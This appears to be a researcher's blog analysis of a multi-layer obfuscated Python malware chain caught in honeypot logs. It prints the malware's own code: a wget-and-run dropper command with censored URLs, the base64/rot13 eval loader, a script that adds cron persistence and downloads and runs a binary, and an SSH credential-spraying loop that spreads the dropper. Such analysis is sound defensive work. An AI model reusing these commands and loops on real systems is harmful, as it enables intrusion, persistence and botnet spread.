Deobfuscating multiple layers of malicious python
Table of Contents
1. Background
One of my research projects analyzes large sets of honeypot logs in order to identify emerging trends in Tools Techniques and Procedures (TTPs) within deployed malware. A recent trend, reported by one of our daily statistical correlation tools, caught my eye and warranted further investigation. Since the results of my analysis may be of interest to others: here's a quick breakdown of one particular python rabbit hole. It's not amazingly complex, but it is far from simple and is generally an interesting breakdown in the usage of multiple layers of obfuscated python in malware.
2. Layer One: command line bash/ssh
The honeypot log in question turned up the following commands (formatted for readability) that started appearing at low levels on 2021-12-12. Other bot networks send similar commands hundreds and thousands of times a day, but this particular command is only caught a few times a day.
cd /tmp (( apt update -y && apt install python3 wget -y ) || ( yum update -y && yum install epel-release -y && yum install python3 wget -y )) wget -O updater.zip [MALWAREURLCENSORED] python3 updater.zip rm updater.zip && cd ~
This part isn't anything special, of course: it's a simple
downloader/dropper that first tries to make sure the tools it needs
(python3 and wget) are installed. It does assume it's on a
debian or redhat-like system, but otherwise will still work on
other systems that have python3 and wget pre-installed (like
many, if not most, *nix systems).
Outstanding question 1: When reading scripts like this it always
leaves me with random questions like: "what's the point of the final
cd to $HOME"?
3. Layer Two: the downloaded python script
The python script that was downloaded (update.zip above) is much
more interesting (formatted for brevity and actual malware removal
as well):
import base64, codecs magic = 'aW1wb3J0IHN5cyx...BmbDoNCgkJCQlp' love = 'MvOhqlOcovOzoP5l...A0MJ1xYJkiM2yh' god = 'ZCIpDQoJCQlzeXMuZ...8gJycnKQ0KCQlh' destiny = 'LzZbWlpaVT1eM...tcQDbAPvNAPt0X' joy = '\x72\x6f\x74\x31\x33' trust = \ eval('\x6d\x61\x67\x69\x63') + \ eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + \ eval('\x67\x6f\x64') + \ eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29') eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))
First, to the author: good creative use of variable names.
So what does the above do?
- Creates 4 variables (
magic…destiny) with base64 encoded strings. - Creates a 5th variable (
joy) containing the string "rot13", encoded in hexadecimal. - Create a 6th variable (
trust) that is created by concatenating the results from multiple calls toeval(). Each of the inputs toeval()are further obfuscated by encoding the variable names in hexadecimal to prevent (easy) human readability. The arguments of these evals() are really:- the string 'magic', thus resulting in the contents of the
magicvariable - the contents of
codecs.decode(love, joy), which results in applying the rot13 substitution algorithm to the contents of thelovevariable - the
godvariable, resulting in its contents - the
destinyvariable and thus its rot13 contents
- the string 'magic', thus resulting in the contents of the
Summarizing for readability, the trust assignment line becomes:
trust = \ magic + \ codecs.decode(love, joy) + \ god + \ codecs.decode(destiny, joy) +
The final contents of the trust variable is a base64 string of 1824
characters. This is finally fed to base64.b64decode() and
compiled and evaluated. This in turn decodes to yet another python
script, which is then executed.
4. Layer Three: the embedded, evaluated python script
The output of the previous step produces a longer string of python
code that is passed to compile and eval to run the following
code (edited for formatting and malware URL removal). I'll break
this longer script into chunks.
First, the top few lines imports things and defines the nw
variable and sets it to 12 , which I'll get back to in a minute.
import sys,os,subprocess,time nw="12"
After that is a number of functions that are just filler, from what I can tell, as they're never actually used:
def a(b): c = b*2 return c def oO1oO(OO): OOO = 0 return OO def oOOOO2(OO): OOO = 0 return OO def oOo1(OO): OOO = 0 return OO
Next there is one more defined function, which actually is used, and
is just a wrapper around os.system() to ensure it continues in
case of any exceptions being thrown:
def abc(cl): try: os.system(cl) except: pass
Finally comes the meat of the script, which starts by checking if a
/opt/lsb/.pki file exists on the system being penetrated and if it
contains the string from the nw variable above ("12"). Depending
on these results, it sets the ald variable to 1 if the file exists
and contains "12", or otherwise sets it to 0.
The importance of the ald variable will become apparent in a minute.
I'll also question the need for the while True component of this
script at the end of this post.
while True: try: ald = 0 try: with open('/opt/lsb/.pki', "r+") as fl: if nw in fl.read(): ald = 1 else: ald = 0 except: ald = 0
Next, the script similarly sets a crn variable to 1 if a cronjob
has already been configured that executes the final malware binary
fuse (as we will see a bit later).
crn = 0 try: cron = subprocess.check_output("crontab -l",shell=True).decode(\'utf-8\') if "fuse" in cron: crn = 1 else: crn = 0 except: crn = 0
Now that the script has properly probed the system for components of
its previous runs, it can actually do something with the results.
First, it checks to see if the ald variable indicates that "12"
was in the /opt/lsb/.pki file:
if ald == 1: print("[1]- Stopped /usr/lib/systemd/systemd-logind") sys.exit()
This check is functionally acting as a version control system,
allowing upgrades to previously compromised systems without
re-running the installation script otherwise. Thus, if the author
changed the string in the nw variable to "13" but "12" was stored
in /opt/lsb/.pki, the rest of the script would continue running
to self-update to the latest and greatest malware.
Outstanding question: what's the purpose of this print message?
Note/Bug: Because of the way string searching is used for "12", it would also match "112" and any other string containing "12"; the version handling isn't as robust as it could be. But I'm certainly being picky here in my code review.
Next up, the script installs fuse with apt or yum, kills any
running process named fuse, and removes any existing fuse binary
from /usr/sbin:
abc(''' apt install fuse python3 -y || yum install epel-release python3 fuse -y ''') abc(''' pkill fuse; rm /usr/sbin/fuse -R ''')
Afterward, if there is no cron job installed to re-run the fuse
binary at reboot, it adds a crontab entry to do so. (Again, the
previous check for the string "fuse" in any cronjob will probably
produce some false positives.)
if crn == 0: abc('''(crontab -l 2>/dev/null || true; echo "@reboot pkill updated;nohup /usr/sbin/fuse>/dev/null &") | crontab - ''')
Finally, we get to the creation of the /opt/lsb/.pki version number file:
abc(''' rm -R /opt/lsb/ ''') abc(''' mkdir /opt/lsb/ && echo 'keys-0 {}'>/opt/lsb/.pki '''.format(nw))
Finally, we get to the actual fuse malware downloading, installing
and initial run. Again, we see the script using print to log a
fake stopped message for systemd-logind for some reason.
abc(''' wget -O /usr/sbin/fuse [MALWAREURLCENSORED] && chmod +x /usr/sbin/fuse''') abc(''' nohup /usr/sbin/fuse>/dev/null & ''') print("[1]+ Stopped /usr/lib/systemd/systemd-logind") sys.exit() except: sys.exit()
One final Outstanding question: why the while True portion of
the script? There is no portion of the script that does not result
in sys.exit() being called, which means the while loop should
only ever be run once anyway.
5. Layer Four: compiled python
The final /usr/bin/fuse binary that is installed is also a python
script, but has been compiled into a linux ELF binary. We can
determine this by examining it using strings and/or objdump -D and
noticing a pydata section in the ELF dump output. This pydata
section contains a compiled python (pyc) formatted block, with a 16
byte header showing that a recent version of python was used to compile
it.
We next extract this pydata section in order to extract the compiled python byte code.
objcopy -O binary --only-section=pydata \ --set-section-flags pydata=alloc fuse fuse-pythoncode.bin
We can use pyinstaller's archive_viewer.py command to list and
extract the pieces of the saved pydata section:
cd pyinstaller PYTHONPATH=. python3 \ ./PyInstaller/utils/cliutils/archive_viewer.py -b ../fuse-pythoncode.bin | head -15
['struct', 'pyimod01_os_path', 'pyimod02_archive', 'pyimod03_importers', 'pyimod04_ctypes', 'pyiboot01_bootstrap', 'pyi_rth_pkgutil', 'pyi_rth_multiprocessing', 'pyi_rth_inspect', 'fuse', '_cffi_backend.cpython-39-x86_64-linux-gnu.so', 'bcrypt/_bcrypt.abi3.so', 'cryptography/hazmat/bindings/_openssl.abi3.so', 'cryptography/hazmat/bindings/_padding.abi3.so', 'lib-dynload/_asyncio.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_bz2.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_cn.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_hk.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_iso2022.cpython-39-x86_64-linux-gnu.so', 'lib-dynload/_codecs_jp.cpython-39-x86_64-linux-gnu.so',
We note that fuse is also the name of the actual final python block
to be executed, so we extract this as well using the
archive_viewer.py's X command. But it appears to be C-compiled
cpython code so decoding it is a bit trickier. However, we're in luck
because the developer wasn't as smart as they could have been: if we
run strings strings on file, we see 4 base64 encoded strings in the
output. Like before, 2 of these are rot13 encoded. We can then
combine them using the same techniques as the previous four strings
above (magic … destiny).
6. Layer Five: the final python bot code
After extracting these 4 more lines of base64 encoded strings, we get an 845 line python bot script with the following functions in it:
grep 'def ' final-packaged-python.py
def encrypt(data,key): def decrypt(data,key): def litehash(data): def getProxy(): def getRandomPayload(size): def getRandomString(size): def pack_varint(val): def pack_str(bb): def getSocket(ip, port,ifprox,recons,proxyHost=False,proxyPort=0): def getSSL(sock, host): def loader(addr): def scan(): def http_get(task_name, url, host, ip, port,ifprox, rcns): def http_fast(task_name, url, host, ip, port,ifprox, rcns): def mccrash(task_name,ip,port,hostn,ifprox, rcns): def mcbot(task_name,ip,port,hostn,ifprox, rcns): def mcping(task_name,ip,port,ifprox, rcns): def mcdata(task_name,ip,port,hostn,ifprox, rcns): def junk(task_name,ip,port,ifprox, rcns): def handshake(task_name,ip,port,ifprox, rcns): def tcp(task_name,ip,port,size,ifprox, rcns): def netty(task_name,ip,port,pkt,ifprox, rcns): def raknet(task_name,ip,port): def vse(task_name,ip,port): def udp(task_name,ip,port,size): def getHTTP(base): def download_file(url, file): def attack(method,ip,port,size,threads,times, ifprox, rcns): def getIP(): def execer(cmd): def updateProxy(url):
As we can see from this set of functions, we've finally hit the end of the obfuscation train, revealing a general daemon containing various implements of destruction. Included in this final malware toolkit is the original payload delivery string we started with at the top of this post:
payload = "cd /tmp; ... python3 updater.zip && rm updater.zip && cd ~ "
Along with it, the code to deliver it over SSH:
for i in credentials: try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(addr, username=i[0], password=i[1]) stdin, stdout, stderr = ssh.exec_command(f'cat /proc/1') if str(stdout.read()).split('b\'')[1] != '': i, o, e = ssh.exec_command(payload) time.sleep(10) break ssh.close() except Exception as E: #print(E) time.sleep(1) continue
7. Final comments
All in all, this was an interesting trail to analyze – it demonstrates the greater level of obfuscation more talented malicious actors will use, beyond what the basic script kiddies will.
Does this (still simple-ish) type of obfuscation technique work? Yes. It almost certainly raises the author above the low-hanging fruit of average malware collection systems. For example, none of the scripts or files above appear in the industry's leading database (VirusTotal) as of the date this analysis was completed. I submitted the final python payload to VirusTotal as well, but all of the engines report "Undetected" and thus not malicious in nature – clearly an error.
The slowly increasing usage of python in active malicious actor communities will hopefully trigger more malware detection engines to beef up their automated algorithms. Hopefully.
Acknowledgments: thank you to Robert Story for reviewing this!